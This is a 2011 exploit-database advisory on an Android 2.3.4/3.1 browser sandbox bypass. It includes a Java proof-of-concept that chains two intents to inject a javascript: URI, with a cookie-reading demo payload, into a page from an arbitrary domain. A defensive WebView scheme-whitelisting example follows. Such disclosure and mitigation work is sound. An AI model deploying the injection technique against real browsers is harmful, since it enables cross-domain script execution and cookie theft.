Open Handset Alliance Android 2.3.4/3.1 – Browser Sandbox Security Bypass

  • Author: Roee Hay
    Date: 2011-08-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36006/
  • source: https://www.securityfocus.com/bid/48954/info
    
    Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.
    
    Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.
    
    Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected. 
    
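    import android.app.Activity;
    import android.content.ComponentName;
    import android.content.Intent;
    import android.net.Uri;
    import android.os.Bundle;

    public class CasExploit extends Activity
    {
        // Explicit target: the stock browser's main activity.
        static final String mPackage = "com.android.browser";
        static final String mClass = "BrowserActivity";
        static final String mUrl = "http://target.domain/";
        static final String mJavascript = "alert(document.cookie)";
        // Delay between the two intents, in milliseconds, so the page can load.
        static final int mSleep = 15000;

        @Override
        public void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.main);
            // First intent: open the target page in the browser.
            startBrowserActivity(mUrl);
            try {
                Thread.sleep(mSleep);
            }
            catch (InterruptedException e) {}
            // Second intent: a javascript: URI sent to the same browser activity.
            startBrowserActivity("javascript:" + mJavascript);
        }

        // Sends an explicit VIEW intent carrying the given URL to the browser.
        private void startBrowserActivity(String url) {
            Intent res = new Intent("android.intent.action.VIEW");
            res.setComponent(new ComponentName(mPackage, mPackage + "." + mClass));
            res.setData(Uri.parse(url));
            startActivity(res);
        }
    }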
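
A defensive counterpart to the proof of concept above, added here as an example and not taken from the advisory or from Android's source: an activity that hosts a WebView and accepts VIEW intents checks the URI scheme before loading, so a follow-up javascript: intent is dropped instead of running in the page already displayed. The names SafeViewerActivity, handleExternalIntent and isAllowedScheme are hypothetical.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Hypothetical WebView host; class and method names are illustrative.
public class SafeViewerActivity extends Activity {
    // Schemes accepted from other apps. javascript: is excluded because
    // loadUrl() would run it in the page that is already displayed.
    private static final Set<String> ALLOWED_SCHEMES =
            new HashSet<>(Arrays.asList("http", "https"));
    private WebView mWebView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        setContentView(mWebView);
        handleExternalIntent(getIntent());
    }

    // Later intents delivered to an existing instance arrive here.
    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        setIntent(intent);
        handleExternalIntent(intent);
    }

    private void handleExternalIntent(Intent intent) {
        Uri uri = (intent == null) ? null : intent.getData();
        if (uri == null || !isAllowedScheme(uri.getScheme())) {
            return; // rejected: the URI never reaches loadUrl()
        }
        mWebView.loadUrl(uri.toString());
    }

    static boolean isAllowedScheme(String scheme) {
        return scheme != null
                && ALLOWED_SCHEMES.contains(scheme.toLowerCase(Locale.ROOT));
    }
}
```

The check runs on both entry points (onCreate and onNewIntent), since the second intent in the proof of concept is sent while the target page is already open.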